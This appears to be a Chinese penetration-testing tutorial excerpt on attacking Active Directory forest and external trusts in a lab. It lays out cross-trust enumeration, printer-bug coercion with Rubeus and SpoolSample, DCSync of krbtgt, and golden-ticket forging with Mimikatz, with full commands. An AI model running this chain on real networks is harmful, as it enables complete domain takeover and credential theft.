外部信任和林信任的利用
域林信任环境搭建如下:
当前林域控:dc.a.com (Windows Server 2012 R2)
目标林域控:bdc.b.com (Windows Server 2012 R2)
当前域域控:adc1.a.com (Windows Server 2012 R2)
目标域域控:bdc1.b.com (Windows Server 2012 R2)
外部信任环境外部信任,如图7-16所示。
图 7-16 信任关系
外部信任和林信任因为存在sid过滤所以无法利用SID History获取权限,但是至少我们可以查询到任何正常的活动目录信息,甚至可以实施跨信任边界的kerberosating攻击。
使用adfind工具可以获取信任域的完整信息,这里以获取Administrator用户的详细信息为例。输入下列命令,我们可以导出全部用户的信息,然后通过对比目标域和当前域的用户列表,查找同时加入了两个域的用户,尝试这些用户是否具有目标域的权限,如图7-17所示。
adfind下载地址:http://www.joeware.net/freetools/tools/adfind/。
adfind -h bdc1.b.com -sc u:Administrator
图 7-17获取信任域的完整信息
Get-DomainForeignGroupMember -Domain B.com
图 7-18 列出加入目标域用户组的外部用户
利用无约束委派+MS-RPRN获取信任林权限
如果我们已经获取了森林中某个域控(或者配置了无约束委派的任何服务器)的权限,可以使用MS-RPRN的RpcRemoteFindFirstPrinterChangeNotification(Ex)方法来强迫信任林的域控向我们控制的服务器发起身份认证请求,然后利用捕捉到的票据获取信任林任意用户的哈希,进而获取目标林的权限。
Rubeus.exe monitor /interval:5 /filteruser:BDC$
图 7-19监控身份认证请求
SpoolSample bdc.b.com dc.a.com
图 7-20发起身份认证请求
图 7-21捕捉认证请求并保存
Rubeus.exe ptt /ticket:XXXX
图 7-22票据注入到内存
Mimikatz.exe “lsadump::dcsync /domain:B.com /user:Bkrbtgt” exit
图 7-23获取目标域的kebtgt哈希
Mimikatz.exe “Kerberos::golden /user:Administrator /domain:B.com /sid:S-1-5-21-1163464416-126101326-234308999 /rc4:0d96891dc4749658f448e1ed26aa2f4d /ptt” exit
dir \bdc.b.comC$
图 7-24构造黄金票据注入内存并获取目标权限
— 实验室旗下直播培训课程 —
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...